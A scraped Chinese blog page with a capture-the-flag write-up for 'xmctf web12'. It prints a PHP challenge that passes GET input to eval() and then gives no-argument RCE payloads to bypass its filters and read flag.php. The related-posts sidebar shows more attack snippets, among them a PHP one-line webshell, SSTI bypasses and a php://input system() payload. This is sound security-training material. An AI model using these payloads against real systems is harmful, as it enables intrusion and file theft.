xmctf-web-web12-wp

最新推荐文章于 2022-01-11 19:47:25 发布
最新推荐文章于 2022-01-11 19:47:25 发布
阅读量140 收藏
点赞数
分类专栏: ctf记录
><本博客上原创文章未经本人许可,不得用于商业用途。转载请注明出处,否则保留追究法律责任的权利。><
本文链接:https://blog.csdn.net/weixin_46439278/article/details/118219892
版权

web12

源代码

<?php
header("Content-Type: text/html;charset=utf-8");
include "flag.php";
echo "flag在哪里呢?<br>";
highlight_file(__FILE__);
error_reporting(0);
if(isset($_GET['exp'])){
    if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//i', $_GET['exp'])) {
        if(';' === preg_replace('/[a-z,_]+\((?R)?\)/', NULL, $_GET['exp'])) {
            if (!preg_match('/et|cu|readfile|flip|na|info|dec|bin|hex|oct|pi|log/i', $_GET['exp'])) {
                // echo $_GET['exp'];
                @eval($_GET['exp']);
            }
            else{
                die("还差一点哦!");
            }
        }
        else{
            die("再好好想想!");
        }
    }
    else{
        die("还想读flag,臭弟弟!");
    }
}
// highlight_file(__FILE__);
?>

法一

函数描述
localeconv()获取 ‘.’
current()
pos()		返回当前数组值
next()获取下一个数组的值
end()获取最后一个数组的值
array_rand()返回随机的数字键值
arrat_flip()数组的键名和键值交换
scandir()返回指定目录中的文件和文件夹
array_reverse()数组逆序

payload

#获取当前目录的文件
?exp=var_dump(scandir(pos(localeconv())));

接下来获取flag.php
payload:

?exp=highlight_file(next(array_reverse(scandir(pos(localeconv())))));

法二

函数描述
session_start()开启session
session_id()获取 PHPSESSID的值

payload

?exp=highlight_file(session_id(session_start()));

BP抓包添加一行

然后查看响应包就能得到flag

8dba5045b4638241db0f44e8727ba89e.php

居上7788
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
xmctf web12-考核(无参数RCE)
羽的博客
07-07 1360
web12-考核 无参数RCE <?php header("Content-Type: text/html;charset=utf-8"); include "flag.php"; echo "flag在哪里呢?<br>"; highlight_file(__FILE__); error_reporting(0); if(isset($_GET['exp'])){ if (!preg_match('/data:\/\/|filter:\/\/|php:\/\/|phar:\/\//
php header utf8 插入header("Content-type: text/html; charset=utf-8");
weixin_34307464的博客
05-22 441
PHP文件插入header("Content-type: text/html; charset=utf-8"); 相当于页面里面的&lt;meta http-equiv="Content-Type" content="text/html; charset=utf-8" /&gt;
WEB攻防-PHP特性-学以致用
luffysec的博客
01-11 4520
学习笔记-WEB攻防-PHP特性-学以致用
php显示乱码的处理header("Content-type:text/html;charset=utf-8");
蒗若晨曦
05-16 1785
当php显示乱码时,在程序最前面加上下面一句即可: header("Content-type:text/html;charset=utf-8");
xmctf-web-web11-wp
居上
06-25 95
web11 后端仍然使用的是flask,然后同时也存在SSTI。但是过滤了一些字符。 经过fuzz之后发现过滤了一些字符如 . _ arg payload #get传入 ?name={{ ()|attr(request['values']['x1'])|attr(request['values']['x2'])| attr(request['values']['x3'])()|attr(request['values']['x6'])(233)| attr(request['values']['x4'])|
xmctf-web-web3-wp
居上
06-25 110
web3 源代码 <?php highlight_file(__FILE__); $content = @$_GET['content'] ? "---mylocalnote---\n" . $_GET['content'] : ""; $name = @$_GET['name'] ? $_GET['name'] : ''; str_replace('/', '', $name); str_replace('\\', '', $name); file_put_contents("/tmp/" . $n
xmctf-web-RCE-wp
居上
06-25 94
RCE 源代码 <?php error_reporting(0); highlight_file(__file__); $ip = $_GET['ip']; if (isset($ip)) { if(preg_match("/(;|`| |&|cp|mv|cat|tail|more|rev|tac|\*|\{)/i", $ip)){ die("hack"); }else if(preg_match("/.*f.*l.*a.*g.*/", $ip)){ die("
xmctf-web-web8-wp
居上
06-25 281
web8 考点 SSTI flask 根据提示,需要以admin的方式访问flag。携带当前session访问flag不能成功的。 传参数name={{7*7}},发现是SSTI。 然后传参?name={{config}}可以查看到,secret_key 后端使用的是flash框架。 先安装pip install flask-unsign[wordlist] 。 然后在浏览器中复制当前session flask-unsign --decode --cookie "eyJ1c2VybmFtZSI
xmctf-web-web4-wp
居上
06-25 187
web4 好几个四季了,我在等我的主人回来 key:e086aa137fa19f67d27b39d0eca18610 key扔cmd5解出1.1.1.1,可能为IP地址,放到请求头 X-Forwarded-For: 1.1.1.1 提示存在dhudndrgrhs.php,访问得到源代码 源代码 <?php show_source(__FILE__); error_reporting(0); $disable_fun = ["assert","print_r","system", "shell_ex
buuctf-web-[ACTF2020 新生赛]Upload 1-wp
居上
11-11 3561
[ACTF2020 新生赛]Upload 1 来到主页发现是一个文件上传的题目。 先随便上传一个文件试一试。 我上传了一个.php结尾的PHP一句话木马,可以看到被过滤了。审查一下元素。 可以发现前端有一个事件,直接删除该事件。再上传一遍试一试。 发现还是不能传上去,后端肯定也做了过滤。我们可以创建一个test.phtml文件。 对.phtml文件的解释: 是一个嵌入了PHP脚本的html页面。 将以下代码写入该文件中。 <script language='php'>@eval($_POST[
buuctf-web-[强网杯 2019]随便注-wp
居上
06-22 1351
[强网杯 2019]随便注 源码 (这题本身没有源码,源码是我从网上下载的便于学习) <html> <head> <meta charset="UTF-8"> <title>easy_sql</title> </head> <body> <h1>取材于某次真实环境渗透,只说一句话:开发和安全缺一不可</h1> <!-- sqlmap是没有灵魂的 --> <form
buuctf-web-[SUCTF 2019]EasySQL 1-wp
居上
06-22 992
[SUCTF 2019]EasySQL 源码 网上找的源码 <?php session_start(); include_once "config.php"; $post = array(); $get = array(); global $MysqlLink; //GetPara(); $MysqlLink = mysqli_connect("localhost",$datauser,$datapass); if(!$MysqlL
buuctf-misc-qr-wp
居上
06-21 722
qr 知识点 工具QR Research的使用 过程 使用QR Research得到flag
buuctf-misc-镜子里面的世界-wp
居上
06-21 667
镜子里面的世界 知识点 stegsolve分析图片通道 stegsolve=>Date Extract提取对应通道内容 过程 red plane 0、green plane 0、blue plane 0通道被黑色遮挡,data extract 发现flag
buuctf-misc-N种方法解决-wp
居上
06-20 604
N种方法解决 知识点 使用普通编辑器打开文件,查看隐藏内容 利用html的img标签还原解码后的内容 过程 下载附件是一个KEY.exe文件,无法打开,尝试使用notepad++打开,发现一大串字符 从这个位置开始,复制到网站上解码https://the-x.cn/base64/ 发现是一个png的图片 然后我们发现他是个png的文件,得想办法还原成png文件 写个html的文件,里面加入img标签,将img标签中的src属性改为刚刚得到的整个字符内容 <!DOCTYPE html>
buuctf-misc-假如给我三天光明-wp
居上
06-22 577
假如给我三天光明 知识点 关注图片本身隐藏的信息 过程 打开附件,发现两个文件,一个加密的.zip文件,是上方的一张图片。容易发现张图片下方的部分,是盲文,根据盲文解出的密文,很有可能是对应压缩文件的密码 查表可得,密文:kmdonowg,解压文件成功,得到一个 .wav音频文件,然后听出是莫斯密码,使用audacity打开 flag{wpei08732?23dz} ...
buuctf-misc-乌镇峰会种图-wp
居上
06-22 560
乌镇峰会种图 知识点 普通编辑器打开文件,并搜索字符串 过程 notepad++打开图片,搜索得到flag
buuctf-misc-二维码-wp
居上
06-20 523
二维码 知识点 binwalk分离并提取文件 ziperello破解四位纯数字密码 过程 打开附件是一个二维码图片QR_code.png,用软件扫描之后没有得到flag,先用binwalk分析并提取 binwalk -e QR_code.png 然后进入提取后得到的目录 [外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-7dxPkimD-1624155160357)(C:/Users/Polaris/AppData/Roaming/Typora/typora-user-
ROSE笔记-ctf.show_web3-WP
居上
11-05 517
ctf.show_web3 根据提示,判断类型为文件包含 payload:/?url=php://input,然后用burpsuite抓包 在请求body里写上 <?php system("ls")?> 查看一些当前目录下文件 出现名为ctf_go_go_go的文件 继续在请求头中写入 <?php system("cat ctf_go_go_go")?> 得到flag ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值